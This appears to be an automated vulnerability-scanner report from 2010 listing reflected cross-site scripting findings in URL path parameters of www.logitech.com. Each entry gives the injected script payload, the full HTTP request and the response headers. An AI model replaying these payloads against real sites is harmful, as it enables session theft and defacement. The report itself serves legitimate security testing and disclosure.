<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16870"%3b90c0020112f was submitted in the REST URL parameter 1. This input was echoed as 16870";90c0020112f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us16870"%3b90c0020112f/70/6054 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7960</script><script>alert(1)</script>ee26e764a35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/70e7960</script><script>alert(1)</script>ee26e764a35/6054 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46b5"><script>alert(1)</script>742b245d73b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/70e46b5"><script>alert(1)</script>742b245d73b/6054 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f629d</script><script>alert(1)</script>24eccc840a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/70/6054f629d</script><script>alert(1)</script>24eccc840a1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5fd"><script>alert(1)</script>147d7790afc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/70/6054ca5fd"><script>alert(1)</script>147d7790afc HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a4a4</script><script>alert(1)</script>4b8343d8a36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5a4a4</script><script>alert(1)</script>4b8343d8a36/903/7600 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d479"><script>alert(1)</script>d3ae1e072ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us1d479"><script>alert(1)</script>d3ae1e072ae/903/7600 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d848"%3b342d9cb3a16 was submitted in the REST URL parameter 1. This input was echoed as 3d848";342d9cb3a16 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us3d848"%3b342d9cb3a16/903/7600 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4008</script><script>alert(1)</script>78b174f626c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/903d4008</script><script>alert(1)</script>78b174f626c/7600 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d27e5"><script>alert(1)</script>cd686f92ed3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/903d27e5"><script>alert(1)</script>cd686f92ed3/7600 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b678"><script>alert(1)</script>33e666bff9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/903/76006b678"><script>alert(1)</script>33e666bff9c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d0db</script><script>alert(1)</script>29c99546a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/903/76006d0db</script><script>alert(1)</script>29c99546a1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3146"><script>alert(1)</script>2c2610dff46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usb3146"><script>alert(1)</script>2c2610dff46/about HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e80</script><script>alert(1)</script>7743df94c98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /71e80</script><script>alert(1)</script>7743df94c98/about HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e9e"><script>alert(1)</script>b79a3ce1b12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/about96e9e"><script>alert(1)</script>b79a3ce1b12 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb48</script><script>alert(1)</script>1c163aba3c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/aboutfbb48</script><script>alert(1)</script>1c163aba3c1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68848</script><script>alert(1)</script>a1abecf2f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /68848</script><script>alert(1)</script>a1abecf2f2f/about/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fdf9"><script>alert(1)</script>2f72c084687 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us3fdf9"><script>alert(1)</script>2f72c084687/about/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14301</script><script>alert(1)</script>a0c53573c6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/about14301</script><script>alert(1)</script>a0c53573c6c/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 358b1"><script>alert(1)</script>7e8accd591 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/about358b1"><script>alert(1)</script>7e8accd591/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4331a</script><script>alert(1)</script>1fb18e16aa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /4331a</script><script>alert(1)</script>1fb18e16aa6/about/careers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a907"><script>alert(1)</script>a128250a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us6a907"><script>alert(1)</script>a128250a91/about/careers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e4de"%3b1e0e05f0cdd was submitted in the REST URL parameter 1. This input was echoed as 7e4de";1e0e05f0cdd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us7e4de"%3b1e0e05f0cdd/about/careers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9287b"><script>alert(1)</script>5341fdadae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/about9287b"><script>alert(1)</script>5341fdadae/careers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35be9</script><script>alert(1)</script>88e4c4805a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/about35be9</script><script>alert(1)</script>88e4c4805a3/careers HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3574b"><script>alert(1)</script>de4aae00565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/about/careers3574b"><script>alert(1)</script>de4aae00565 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e1d2</script><script>alert(1)</script>888a9492edc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/about/careers7e1d2</script><script>alert(1)</script>888a9492edc HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
